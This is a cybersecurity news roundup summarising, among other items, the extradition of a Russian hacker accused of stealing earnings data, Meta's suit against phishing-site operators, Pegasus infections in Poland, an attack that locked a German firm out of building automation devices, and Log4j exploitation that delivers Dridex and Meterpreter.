Justice Department Extradites Kremlin-Linked Hacker Accused of Stealing Earnings Information
Meta sues 39,000 phishing sites' operator, US and UK send cyberwarfare experts to Ukraine, NSO spyware used against top Polish opposition figures, German automation company crippled by attack, more
The U.S. Justice Department announced it had extradited from Switzerland a Kremlin-linked Russian national, Vladislav Klyushin, on charges that he participated in a scheme to hack and steal corporate earnings information about Tesla Inc., Roku Inc., and others, earning tens of millions of dollars in illegal profits.
Klyushin, also known as “Vladislav Kliushin,” was arrested in Sion, Switzerland on March 21, 2021, and was extradited to the United States on December 18. Klyushin was charged alongside four other Russian nationals, Ivan Ermakov, Nikolai Rumiantcev, Mikhail Vladimirovich Irzak, and Igor Sergeevich Sladkov, who remain at large. Ermakov, a former member of Russia’s military intelligence agency, was previously and separately charged with hacking crimes in 2018 in former special counsel Robert Mueller’s investigation into Russian interference in the 2016 U.S. presidential election. (Aruna Viswanatha and Dustin Volz / Wall Street Journal)
Related: The Record, Bloomberg, Justice.gov, SEC.gov, CNN, Bloomberg Law, Dark Reading, VOA News, Gizmodo, The Register - Security, Reuters, STL.News, IT News, BusinessWorld, NDTV Gadgets360.com, CyberNews
Meta, the parent company for Facebook, Instagram, and WhatsApp, filed a lawsuit today in a California court against the operators of more than 39,000 phishing sites hosted through the Ngrok service.
Meta seeks to obtain a court injunction and damages of at least $500,000 from the operators of these sites, even before they are identified. The suit alleges the group created phishing sites on their local systems and then used Ngrok, a localhost-to-internet relay service that allows developers to expose their local sites on the ngrok.io domain. According to the suit, the group then spread links to these ngrok.io domains to victims and collected their account credentials. (Catalin Cimpanu / The Record)
According to roughly a dozen officials, the United States and Britain have quietly dispatched cyberwarfare experts to Ukraine to prepare the country to confront cyberattacks against the electric grid, the banking system, and other critical components of Ukraine’s economy and government as Russian president Vladimir Putin plans another incursion into the country.
Officials briefed on the intelligence say that if Putin does launch a cyberattack, either as a stand-alone action or as a precursor to a physical-world attack, it will most likely come after Orthodox Christmas, at the end of the first week of January. (David E. Sanger and Julian E. Barnes / New York Times)
Julian E. Barnes @julianbarnesNEW: Could Putin launch a cyberattack on Ukraine ahead/instead of a real-world strike? US and UK are trying to support Ukraine's cyber defenses--though plugging the holes Kyiv's systems is an impossible task. New with @SangerNYT https://t.co/CRjQdDh7FL
Researchers at the University of Toronto-based Citizen Lab confirmed that the cell phones of two top Polish opposition figures, Polish lawyer Roman Giertych and prosecutor Ewa Wrzosek, were infected by U.S.-sanctioned Israeli spyware NSO Group’s Pegasus spyware.
A Polish state security spokesperson would neither confirm nor deny whether the government ordered the hacks or is an NSO customer. Citizen Lab previously detected multiple infections in Poland dating from November 2017, although it didn’t identify individual victims then. (Frank Bajak and Vanessa Gera / Associated Press)
Eva @evacideJust in case you think NSO Group's Pegasus is only being used to target opposition figures in MENA or LatAm, here's Poland: https://t.co/pVafsSCLJb
Researchers at Limes Security say that a German automation company suddenly lost contact with hundreds of its building automation system (BAS) devices, light switches, motion detectors, shutter controllers, and others after a rare cyber attack locked the company out of the BAS it had constructed for an office building client.
The researchers discovered that three-quarters of the BAS devices in the office building network had been mysteriously purged of their operating system and applications and locked down with the system's own digital security key, which was under the attackers' control. The firm had to revert to manually flipping on and off the central circuit breakers to power on the lights in the building until Limes devised a way to recover the key. The motive behind the attack could have been a failed ransomware incident or simply cyber vandalism. (Kelly Jackson Higgins / Dark Reading)
Related: Limes Security
French video game maker Ubisoft said that a misconfiguration in its IT infrastructure exposed gamer data for its Just Dance video game series players.
A Ubisoft spokesperson said the exposed data was limited to ‘technical identifiers,’ which include GamerTags, profile IDs, Device IDs, and Just Dance videos that were recorded and uploaded to be shared publicly with the in-game community and on users’ social media profiles. (Catalin Cimpanu / The Record)
Researchers at Cryptolaemus warned that the Log4j vulnerability is now being exploited to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.
The threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Then, using Meterpreter, the threat actors can connect to the compromised Linux server and remotely execute commands to spread further on the network, steal data, or deploy ransomware. All organizations scan for vulnerable applications that use Log4j and update them to the latest versions. (Lawrence Abrams / Bleeping Computer)
The Department of Justice announced that it had filed a civil complaint in San Diego federal court to return more than $154 million allegedly stolen from Sony Life Insurance Company Ltd, a subsidiary of Sony, by one of its employees, Rei Ishii.
The complaint alleges that Ishii embezzled funds from the company in May and diverted them to an account he controlled at a La Jolla bank. The U.S. Attorney's Office said Ishii moved the funds by falsifying transaction instructions when the Tokyo-based company attempted to transfer funds between its accounts. Law enforcement could trace Bitcoin transfers by obtaining the private key to Ishii’s bitcoin address following a joint investigation with Japan’s National Police Agency, the Tokyo Metropolitan Police Department, Tokyo District Public Prosecutors Office, and JPEC (Japan Prosecutors unit on Emerging Crimes). (City News Service)
Related: Justice Department
Bangalore, India-based Wipro announced it would acquire Austin, TX-based cybersecurity consulting company Edgile for $230 million.
The company will develop Wipro CyberTransform, an integrated suite that will help enterprises enhance boardroom governance of cybersecurity risk, in collaboration with Edgile. (Rishabh Bhatnagar / Bloomberg Quint)